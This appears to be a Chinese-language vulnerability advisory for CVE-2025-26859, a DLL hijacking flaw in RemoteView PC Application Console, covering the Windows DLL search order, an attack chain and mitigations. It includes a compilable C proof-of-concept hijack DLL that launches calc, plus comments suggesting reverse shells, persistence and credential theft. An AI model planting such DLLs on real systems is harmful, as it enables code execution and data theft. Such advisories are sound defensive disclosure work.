CVE-2025-26859 RemoteView PC控制台未受控搜索路径漏洞

漏洞信息

漏洞编号

CVE-2025-26859

漏洞类型

未受控搜索路径元素（DLL劫持/任意代码执行）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

RemoteView PC Application Console

漏洞概述

CVE-2025-26859是存在于RemoteView PC Application Console（远程控制软件）中的高危安全漏洞。该漏洞属于"未受控搜索路径元素"（Uncontrolled Search Path Element）类型，CVSS评分为7.8，严重等级为HIGH。RemoteView是一款由Rsupport公司开发的远程桌面控制软件，广泛应用于企业远程办公、IT支持等场景。

根据漏洞描述，受影响的产品版本为RemoteView PC Application Console 6.0.2之前的版本。该漏洞的根本原因在于应用程序在加载动态链接库（DLL）时，未能正确限定搜索路径。当应用程序启动时，Windows系统会按照特定的搜索顺序查找所需的DLL文件。如果攻击者能够将一个精心构造的恶意DLL文件放置在与受影响的应用程序相同的目录中，应用程序将优先加载该恶意DLL，从而导致任意代码执行。

该漏洞的攻击向量为本地（AV:L），无需认证（PR:N），但需要用户交互（UI:R）。一旦利用成功，攻击者可以在受害者的系统上以当前用户权限执行任意代码，对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。该漏洞由JPCERT/CC的vultures团队发现并报告，披露日期为2025年10月15日。值得注意的是，Rsupport公司已宣布终止RemoteView PC应用程序控制台服务（参见相关参考链接），用户应尽快迁移到替代方案。

技术细节

该漏洞利用了Windows操作系统中DLL加载机制的固有特性。在Windows系统中，当应用程序通过LoadLibrary()或类似的API加载DLL时，系统会按照以下默认搜索顺序查找DLL文件：

1. 应用程序所在目录
2. 系统目录（System32）
3. 16位系统目录
4. Windows目录
5. 当前工作目录
6. PATH环境变量中列出的目录

RemoteView PC Application Console在加载某些关键DLL时，未能正确使用绝对路径或未通过DLL安全搜索顺序（SafeDllSearchMode）进行保护。攻击者可以利用这一缺陷实施DLL劫持攻击（DLL Hijacking）：

利用方式如下：
1. 攻击者首先分析RemoteView PC Application Console的导入表，确定应用程序尝试加载的DLL名称及其加载顺序。
2. 攻击者创建一个与目标DLL同名的恶意DLL文件，其中包含恶意代码（如反弹shell、持久化后门等）。
3. 攻击者将此恶意DLL放置到RemoteView PC Application Console的安装目录中。
4. 当用户启动RemoteView PC Application Console时，应用程序将优先从自身目录加载恶意DLL，而非系统目录中的合法DLL。
5. 恶意DLL中的代码以RemoteView进程的权限执行，从而实现任意代码执行。

由于该漏洞需要本地访问权限和用户交互（启动应用程序），攻击者通常需要通过社会工程学手段诱导用户执行恶意文件，或结合其他漏洞获取初始访问权限后进行权限提升和持久化。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过逆向分析或使用Process Monitor等工具，确定RemoteView PC Application Console在启动时尝试加载的DLL文件列表及其加载顺序。

STEP 2

步骤2：恶意DLL制作

攻击者创建一个与目标DLL同名的恶意DLL文件，其中包含恶意载荷（如反弹shell、持久化机制等），并确保其导出函数与合法DLL兼容。

STEP 3

步骤3：投递恶意文件

攻击者通过社会工程学（如钓鱼邮件、恶意下载链接）或物理访问等方式，将恶意DLL投递到目标系统的RemoteView安装目录中。

STEP 4

步骤4：触发漏洞

当用户启动RemoteView PC Application Console时，应用程序优先从自身目录加载恶意DLL，恶意代码以RemoteView进程权限执行。

STEP 5

步骤5：权限利用与持久化

恶意代码执行后，攻击者可获取用户权限、建立持久化后门、窃取敏感数据或进行横向移动，实现完全控制目标系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-26859 - RemoteView PC Application Console DLL Hijacking PoC
// This PoC demonstrates the DLL hijacking vulnerability by creating a malicious DLL
// that will be loaded by RemoteView PC Application Console when placed in its directory.

#include <windows.h>

// Entry point executed when the malicious DLL is loaded by the target application
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReasonForCall, LPVOID lpReserved) {
    switch (ulReasonForCall) {
        case DLL_PROCESS_ATTACH:
            // Execute malicious payload when the DLL is loaded into the process
            // Example: Launch a reverse shell or execute arbitrary commands
            WinExec("cmd.exe /c calc.exe", SW_SHOW);
            // In a real attack scenario, this could be:
            // - Reverse shell: connect back to attacker's C2 server
            // - Persistence: add registry keys for autorun
            // - Credential theft: dump browser passwords, tokens, etc.
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

// Export functions that match the legitimate DLL's exports
// (to avoid errors when the application calls them)
__declspec(dllexport) void Function1() { return; }
__declspec(dllexport) void Function2() { return; }

/*
Compilation:
  x86_64-w64-mingw32-gcc -shared -o target.dll poc.c

Usage:
  1. Identify a DLL loaded by RemoteView PC Application Console (e.g., using Process Monitor)
  2. Compile this code with the same name as the target DLL
  3. Place the malicious DLL in the RemoteView installation directory
  4. When the user launches RemoteView, the malicious DLL will be loaded and executed
*/

影响范围

RemoteView PC Application Console < 6.0.2

防御指南

临时缓解措施

在无法立即升级或迁移的情况下，建议采取以下临时缓解措施：1）限制对RemoteView安装目录的访问权限，确保只有管理员才能修改该目录中的文件；2）启用Windows的DLL安全搜索模式（通过注册表设置HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode为1）；3）使用应用程序控制策略（如AppLocker或Windows Defender Application Control）阻止未知DLL的执行；4）部署文件完整性监控（FIM）解决方案，实时检测RemoteView目录中的文件变更；5）提高用户安全意识，避免从不受信任的来源下载文件或点击可疑链接。